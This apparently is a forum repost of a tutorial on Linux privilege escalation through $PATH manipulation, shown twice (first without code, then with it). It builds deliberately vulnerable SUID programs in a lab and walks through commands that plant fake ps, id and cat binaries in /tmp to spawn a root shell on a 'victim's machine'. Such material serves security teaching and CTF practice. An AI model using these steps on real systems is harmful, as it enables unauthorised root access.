luckyboy2112
Banana Technician
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
After solving several OSCP Challenges, we have decided to write an article on the various methods used for Linux privilege escalation, that can be helpful for our readers in their penetration testing project. In this article, we will learn “various methods to manipulate $PATH variable” to gain root access of a remote host machine and the techniques used by CTF challenges to generate $PATH vulnerability that leads to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.
Let’s Start!!
Introduction
PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with the help of PATH Variable in response to commands executed by a user. The superuser also usually has /sbin and /usr/sbin entries for easily executing system administration commands.
It is very simple to view the Path of the relevant user with help of echo command.
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
If you notice ‘.’ in environment PATH variable it means that the logged user can execute binaries/scripts from the current directory and it can be an excellent technique for an attacker to escalate root privilege. This is due to lack of attention while writing program thus admin does not specify the full path to the program.
Method 1
Ubuntu LAB SET_UP
Currently, we are in /home/raj directory where we will create a new directory with the name as
As you can observe in our demo.c file we are calling ps command (Process status) which is system binaries.
After then compile the demo.c file using gcc and promote SUID permission to the compiled file.
Privilege Escalation
First, you need to compromise the target system and then move to the privilege escalation phase. Suppose you successfully login into the victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command.
Hence with the help of above command, an attacker can enumerate any executable file, here we can also observe
Then we move into /home/raj/script and saw an executable file “shell”. So we run this file, and here it looks like this file is trying to run ps and this is a genuine file inside /bin to get Process status.
Echo Command -1st Technique to spawn rootprivilege
Copy Command -2nd Technique to spawn rootprivilege
Symlink command -3rd Technique to spawn rootprivilege
NOTE: symlink is also known as symbolic links that will work successfully if the directory has full permission. In Ubuntu, we had given permission 777 to /script directory in the case of a symlink.
Thus we saw to an attacker can manipulate environment variable PATH for privileges escalation and gain root access.
Method 2
Ubuntu LAB SET_UP
Repeat the same steps as above for configuring your own lab and now inside script directory, we will write a small c program to call a function of system binaries.
As you can observe in our test.c file we are calling id command which is system binaries.
After then compile the test.c file using gcc and promote SUID permission to the compiled file.
Privilege Escalation
Again, you need to compromise the target system and then move to the privilege escalation phase. Suppose you successfully login into the victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command. Here we can also observe /home/raj/script/shell2 having suid permissions.
Then we move into /home/raj/script and saw an executable file “shell2”. So we run this file, it looks like the file shell2 is trying to run id and this is a genuine file inside /bin.
Echo command
Method 3
Ubuntu LAB SET_UP
Repeat above step for setting your own lab and as you can observe in our raj.c file we are calling cat command to read the content from inside etc/passwd file.
After then compile the raj.c file using gcc and promote SUID permission to the compiled file.
Privilege Escalation
Again compromised the Victim’s system and then move for privilege escalation phase and execute the below command to view sudo user list.
Here we can also observe /home/raj/script/raj having suid permissions, then we move into /home/raj/script and saw an executable file “raj”. So when we run this file it put-up etc/passwd file as result.
Nano Editor – 4th Technique to Privilege Escalation
Now type /bin/bash when terminal get open and save it.
Method 4
Ubuntu LAB SET_UP
Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read msg.txt which is inside /home/raj but there is no such file inside /home/raj.
After then compile the demo.c file using gcc and promote SUID permission to the compiled file.
Privilege Escalation
Once again compromised the Victim’s system and then move for privilege escalation phase and execute the below command to view sudo user list.
Here we can also observe /home/raj/script/ignite having suid permissions, then we move into /home/raj/script and saw an executable file “ignite”. So when we run this file it put-up an error “cat: /home/raj/msg.txt” as result.
Vi Editor -5th Technique to Privilege Escalation
Now type /bin/bash when the terminal gets open and saves it.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Let’s Start!!
Introduction
PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with the help of PATH Variable in response to commands executed by a user. The superuser also usually has /sbin and /usr/sbin entries for easily executing system administration commands.
It is very simple to view the Path of the relevant user with help of echo command.
Code:
echo $PATH/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
If you notice ‘.’ in environment PATH variable it means that the logged user can execute binaries/scripts from the current directory and it can be an excellent technique for an attacker to escalate root privilege. This is due to lack of attention while writing program thus admin does not specify the full path to the program.
Method 1
Ubuntu LAB SET_UP
Currently, we are in /home/raj directory where we will create a new directory with the name as
. Now inside the script directory, we will write a small c program to call a function of system binaries.
Code:
pwd
mkdir script
cd script
nano demo.cAs you can observe in our demo.c file we are calling ps command (Process status) which is system binaries.
After then compile the demo.c file using gcc and promote SUID permission to the compiled file.
Code:
ls
gcc demo.c -o shell
chmod u+s shell
ls -la shellPrivilege Escalation
First, you need to compromise the target system and then move to the privilege escalation phase. Suppose you successfully login into the victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command.
Code:
find / -perm -u=s -type f 2>/dev/nullHence with the help of above command, an attacker can enumerate any executable file, here we can also observe
having suid permissions.
Then we move into /home/raj/script and saw an executable file “shell”. So we run this file, and here it looks like this file is trying to run ps and this is a genuine file inside /bin to get Process status.
Code:
ls
./shellEcho Command -1st Technique to spawn rootprivilege
Code:
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoamiCopy Command -2nd Technique to spawn rootprivilege
Code:
cd /home/raj/script/
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:$PATH
./shell
whoamiSymlink command -3rd Technique to spawn rootprivilege
Code:
ln -s /bin/sh ps
export PATH=.:$PATH
./shell
id
whoamiNOTE: symlink is also known as symbolic links that will work successfully if the directory has full permission. In Ubuntu, we had given permission 777 to /script directory in the case of a symlink.
Thus we saw to an attacker can manipulate environment variable PATH for privileges escalation and gain root access.
Method 2
Ubuntu LAB SET_UP
Repeat the same steps as above for configuring your own lab and now inside script directory, we will write a small c program to call a function of system binaries.
Code:
pwd
mkdir script
cd /script
nano test.cAs you can observe in our test.c file we are calling id command which is system binaries.
After then compile the test.c file using gcc and promote SUID permission to the compiled file.
Code:
ls
gcc test.c -o shell2
chmod u+s shell2
ls -la shell2Privilege Escalation
Again, you need to compromise the target system and then move to the privilege escalation phase. Suppose you successfully login into the victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command. Here we can also observe /home/raj/script/shell2 having suid permissions.
Code:
find / -perm -u=s -type f 2>/dev/nullThen we move into /home/raj/script and saw an executable file “shell2”. So we run this file, it looks like the file shell2 is trying to run id and this is a genuine file inside /bin.
Code:
cd /home/raj/script/
ls
./shell2Echo command
Code:
cd /tmp
echo "/bin/bash" > id
chmod 777 id
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell2
whoamiMethod 3
Ubuntu LAB SET_UP
Repeat above step for setting your own lab and as you can observe in our raj.c file we are calling cat command to read the content from inside etc/passwd file.
After then compile the raj.c file using gcc and promote SUID permission to the compiled file.
Code:
ls
gcc raj.c -o raj
chmod u+s raj
ls -la rajPrivilege Escalation
Again compromised the Victim’s system and then move for privilege escalation phase and execute the below command to view sudo user list.
Code:
find / -perm -u=s -type f 2>/dev/nullHere we can also observe /home/raj/script/raj having suid permissions, then we move into /home/raj/script and saw an executable file “raj”. So when we run this file it put-up etc/passwd file as result.
Code:
cd /home/raj/script/
ls
./rajNano Editor – 4th Technique to Privilege Escalation
Code:
cd /tmp
nano catNow type /bin/bash when terminal get open and save it.
Code:
chmod 777 cat
ls -al cat
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./raj
whoamiMethod 4
Ubuntu LAB SET_UP
Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read msg.txt which is inside /home/raj but there is no such file inside /home/raj.
After then compile the demo.c file using gcc and promote SUID permission to the compiled file.
Code:
ls
gcc demo.c -o ignite
chmod u+s ignite
ls -la ignitePrivilege Escalation
Once again compromised the Victim’s system and then move for privilege escalation phase and execute the below command to view sudo user list.
Code:
find / -perm -u=s -type f 2>/dev/nullHere we can also observe /home/raj/script/ignite having suid permissions, then we move into /home/raj/script and saw an executable file “ignite”. So when we run this file it put-up an error “cat: /home/raj/msg.txt” as result.
Code:
cd /home/raj/script/
ls
./igniteVi Editor -5th Technique to Privilege Escalation
Code:
cd /tmp
vi catNow type /bin/bash when the terminal gets open and saves it.
Code:
chmod 777 cat
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./ignite
whoamiAuthor: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here